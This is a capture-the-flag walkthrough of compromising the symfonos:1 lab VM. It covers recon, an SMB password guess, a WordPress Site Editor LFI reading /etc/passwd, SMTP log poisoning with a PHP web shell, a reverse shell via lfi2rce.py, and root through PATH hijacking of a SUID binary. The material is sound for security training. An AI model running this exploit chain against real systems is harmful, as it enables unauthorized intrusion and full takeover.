First step port recognition withnmapor you can use recon

┌──(root@ghost)-[/home/ghost]
└─# recon symfonos.vuln

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤
Hey I was thinking about this part of the code...oh wait, pull request is already done RiJaba1

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 12:41 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:41
Completed NSE at 12:41, 0.00s elapsed
Initiating ARP Ping Scan at 12:41
Scanning symfonos.vuln (10.0.2.7) [1 port]
Completed ARP Ping Scan at 12:41, 0.01s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:41
Scanning symfonos.vuln (10.0.2.7) [65535 ports]
Discovered open port 445/tcp on 10.0.2.7
Discovered open port 139/tcp on 10.0.2.7
Discovered open port 25/tcp on 10.0.2.7
Discovered open port 22/tcp on 10.0.2.7
Discovered open port 80/tcp on 10.0.2.7
Completed SYN Stealth Scan at 12:41, 1.26s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.7.
Initiating NSE at 12:41
Completed NSE at 12:41, 0.00s elapsed
Nmap scan report for symfonos.vuln (10.0.2.7)
Host is up (0.000062s latency).
Not shown: 65530 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:2A:FD:57 (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 12:41
Completed NSE at 12:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.46 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

[+] [smb]
SMB         symfonos.vuln   445    SYMFONOS         [*] Windows 6.1 (name:SYMFONOS) (domain:) (signing:False) (SMBv1:True)
[+] Guest session       IP: symfonos.vuln:445   Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        helios                                                  NO ACCESS       Helios personal share
        anonymous                                               READ ONLY
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.5.16-Debian)

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        helios          Disk      Helios personal share
        anonymous       Disk      
        IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            SYMFONOS
[~] [smb knocker]
[print$]
tree connect failed: NT_STATUS_ACCESS_DENIED
[helios]
tree connect failed: NT_STATUS_ACCESS_DENIED
[anonymous]
Current directory is \\symfonos.vuln\anonymous\
  .                                   D        0  Fri Jun 28 21:14:49 2019
  ..                                  D        0  Fri Jun 28 21:12:15 2019
  attention.txt                       N      154  Fri Jun 28 21:14:49 2019

                19994224 blocks of size 1024. 17249836 blocks available
[IPC$]
Current directory is \\symfonos.vuln\IPC$\
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

[+] [fuzzin server]
http://symfonos.vuln [200 OK] Apache[2.4.25], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.0.2.7]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Jul 12 12:41:32 2022
URL_BASE: http://symfonos.vuln:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://symfonos.vuln:80/ ----
+ http://symfonos.vuln:80/index.html (CODE:200|SIZE:328)                                                                                                                                          
==> DIRECTORY: http://symfonos.vuln:80/manual/                                                                                                                                                    
+ http://symfonos.vuln:80/server-status (CODE:403|SIZE:301)                                                                                                                                       
                                                                                                                                                                                                  
-----------------
END_TIME: Tue Jul 12 12:41:33 2022
DOWNLOADED: 4612 - FOUND: 2

recon reports five tcp ports open 22 for ssh, 25 for smtp, 80 for http, 135 and 445 for smb. Additionally recon drops useful smb information using tools as smbmap or smbclient. We can see a few server info but we are not focused on the server yet, let's gain some smb information

┌──(root@ghost)-[/home/ghost]
└─# smbclient -N \\\\symfonos.vuln\\anonymous
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jun 28 21:14:49 2019
  ..                                  D        0  Fri Jun 28 21:12:15 2019
  attention.txt                       N      154  Fri Jun 28 21:14:49 2019

                19994224 blocks of size 1024. 17249248 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (50.1 KiloBytes/sec) (average 50.1 KiloBytes/sec)
smb: \> exit
┌──(root@ghost)-[/home/ghost]
└─# cat attention.txt
Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus

Humm somebody is mad because someone is using weak or reused passwords, totally agree with that, let's see if user helios is involved in this madness

┌──(root@ghost)-[/home/ghost]
└─# smbclient \\\\symfonos.vuln\\helios -U helios
Enter WORKGROUP\helios's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jun 28 20:32:05 2019
  ..                                  D        0  Fri Jun 28 20:37:04 2019
  research.txt                        A      432  Fri Jun 28 20:32:05 2019
  todo.txt                            A       52  Fri Jun 28 20:32:05 2019

                19994224 blocks of size 1024. 17249244 blocks available
smb: \> get research.txt
getting file \research.txt of size 432 as research.txt (140.6 KiloBytes/sec) (average 140.6 KiloBytes/sec)
smb: \> get todo.txt
getting file \todo.txt of size 52 as todo.txt (12.7 KiloBytes/sec) (average 67.5 KiloBytes/sec)
smb: \> exit

helios user is using qwerty password for smb

┌──(root@ghost)-[/home/ghost]
└─# cat todo.txt
1. Binge watch Dexter
2. Dance
3. Work on /h3l105

Dev seems working on /h3l105 path, after get in http://symfonos.vuln/h3l105/ we found that some resources are pointing to symfonos.local so we add it to /etc/hosts, now website looks as should be. Once again we need information about the news

┌──(root@ghost)-[/home/ghost]
└─# whatweb  "http://symfonos.local/h3l105/"
http://symfonos.local/h3l105/ [200 OK] Apache[2.4.25], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.0.2.7], JQuery, MetaGenerator[WordPress 5.2.2], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[helios site – Just another WordPress site], UncommonHeaders[link], WordPress[5.2.2]

We are pointing to a wordpress site now, keep it in mind

┌──(root@ghost)-[/home/ghost]
└─# wpscan  -e u,p --url "http://symfonos.local/h3l105/"
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://symfonos.local/h3l105/ [10.0.2.7]
[+] Started: Tue Jul 12 13:18:09 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://symfonos.local/h3l105/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://symfonos.local/h3l105/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://symfonos.local/h3l105/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://symfonos.local/h3l105/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://symfonos.local/h3l105/index.php/feed/, https://wordpress.org/?v=5.2.2
 |  - http://symfonos.local/h3l105/index.php/comments/feed/, https://wordpress.org/?v=5.2.2

[+] WordPress theme in use: twentynineteen
 | Location: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://symfonos.local/h3l105/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=====================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://symfonos.local/h3l105/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jul 12 13:18:11 2022
[+] Requests Done: 53
[+] Cached Requests: 6
[+] Data Sent: 14.929 KB
[+] Data Received: 521.126 KB
[+] Memory used: 173.656 MB
[+] Elapsed time: 00:00:01

User admin found and more folders. If we navigate to http://symfonos.vuln/h3l105/wp-content/uploads/ we we'll see siteeditor folder

┌──(root@ghost)-[/home/ghost]
└─# searchsploit wordpress site editor
searchsploit wordpress site editor
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                   |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Site Editor 1.1.1 - Local File Inclusion                                                                                                        | php/webapps/44340.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
┌──(root@ghost)-[/home/ghost]
└─# cat /usr/share/exploitdb/exploits/php/webapps/44340.txt
** Proof of Concept **
http:///wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

If you have wpscan token you will see a Mail Masta 1.0 plugin report, this is a workaround that I'm not covering here

┌──(root@ghost)-[/home/ghost]
└─# searchsploit 'WordPress Plugin Mail Masta 1.0 - Local File Inclusion'
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                   |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion                                                                                                           | php/webapps/40290.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
┌──(root@ghost)-[/home/ghost]
└─# cat /usr/share/exploitdb/exploits/php/webapps/40290.txt
...
Typical proof-of-concept would be to load passwd file:

http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

Back to Site Editor

┌──(root@ghost)-[/home/ghost]
└─# curl "http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:111::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
helios:x:1000:1000:,,,:/home/helios:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:109:115::/var/spool/postfix:/bin/false
{"success":true,"data":{"output":[]}}

After a hard enumeration, knowing smtp port is open, we proceed to curl "http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios" and we get /var/mail/helios output, let's try if we have write permissions by log poisoning

As this injection requires specific params I'll proceed to make the injection manually, later I will use lfi2rce slightly modifying the smtp variable in the source code smtp_file_to_poison='/var/mail/helios' to get an auto reverse shell

┌──(root@ghost)-[/home/ghost]
└─# telnet symfonos.local 25
Trying 10.0.2.8...
Connected to symfonos.local.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
MAIL FROM:<unknow>
250 2.1.0 Ok
RCPT TO:helios
250 2.1.5 Ok
data
354 End data with .
<?php system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as 5A44D406A1
quit
221 2.0.0 Bye
Connection closed by foreign host.
┌──(root@ghost)-[/home/ghost]
└─# lfi2rce.py "http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=" smtp 10.0.2.6 1337
lfi2rce ~by 0bfxgh0st*

Poison /var/mail/helios


[+] Sending payload

listening on [any] 1337 ...
connect to [10.0.2.6] from symfonos.local [10.0.2.8] 34822
bash: cannot set terminal process group (470): Inappropriate ioctl for device
bash: no job control in this shell
<ite-editor/editor/extensions/pagebuilder/includes$ whoami
whoami
helios
<ite-editor/editor/extensions/pagebuilder/includes$ 

And connected, time to elevate our privileges

helios@symfonos:/home/helios/share$ find / -type f -perm /6000 2>/dev/null
find / -type f -perm /6000 2>/dev/null
/sbin/unix_chkpwd
/usr/sbin/postdrop
/usr/sbin/postqueue
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/expiry
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/bsd-write
/usr/bin/wall
/usr/bin/ssh-agent
/usr/bin/chfn
/usr/bin/dotlockfile
/usr/bin/crontab
/usr/bin/dotlock.mailutils
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping

We are looking for suid programs and we found something relevant in /opt/statuscheck, let's check what's inside the binary

helios@symfonos:/opt$ strings statuscheck
strings statuscheck
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H
http://lH
ocalhostH

As we can see statuscheck is invoking curl command, there is a way to escalate privileges from this by path hijacking

helios@symfonos:/opt$ cd /tmp   
cd /tmp
helios@symfonos:/tmp$ echo "/bin/sh" > curl
echo "/bin/sh" > curl
helios@symfonos:/tmp$ chmod 777 curl
chmod 777 curl
helios@symfonos:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
whoami
root
cd /root 
ls -la
total 24
drwx------  2 root root 4096 Jun 28  2019 .
drwxr-xr-x 22 root root 4096 Jun 28  2019 ..
lrwxrwxrwx  1 root root    9 Jun 28  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Jun 28  2019 .selected_editor
-rw-r--r--  1 root root 1735 Jun 28  2019 proof.txt
cat proof.txt

        Congrats on rooting symfonos:1!

                 \ __
--==/////////////[})))==*
                 / \ '          ,|
                    `\`\      //|                             ,|
                      \ `\  //,/'                           -~ |
   )             _-~~~\  |/ / |'|                       _-~  / ,
  ((            /' )   | \ / /'/                    _-~   _/_-~|
 (((            ;  /`  ' )/ /''                 _ -~     _-~ ,/'
 ) ))           `~~\   `\\/'/|'           __--~~__--\ _-~  _/, 
((( ))            / ~~    \ /~      __--~~  --~~  __/~  _-~ /
 ((\~\           |    )   | '      /        __--~~  \-~~ _-~
    `\(\    __--(   _/    |'\     /     --~~   __--~' _-~ ~|
     (  ((~~   __-~        \~\   /     ___---~~  ~~\~~__--~ 
      ~~\~~~~~~   `\-~      \~\ /           __--~~~'~~/
                   ;\ __.-~  ~-/      ~~~~~__\__---~~ _..--._
                   ;;;;;;;;'  /      ---~~~/_.-----.-~  _.._ ~\     
                  ;;;;;;;'   /      ----~~/         `\,~    `\ \        
                  ;;;;'     (      ---~~/         `:::|       `\\.      
                  |'  _      `----~~~~'      /      `:|        ()))),      
            ______/\/~    |                 /        /         (((((())  
          /~;;.____/;;'  /          ___.---(   `;;;/             )))'`))
         / //  _;______;'------~~~~~    |;;/\    /                ((   ( 
        //  \ \                        /  |  \;;,\                 `   
       (<_    \ \                    /',/-----'  _> 
        \_|     \\_                 //~;~~~~~~~~~ 
                 \_|               (,~~   
                                    \~\
                                     ~~

        Contact me via Twitter @zayotic to give feedback!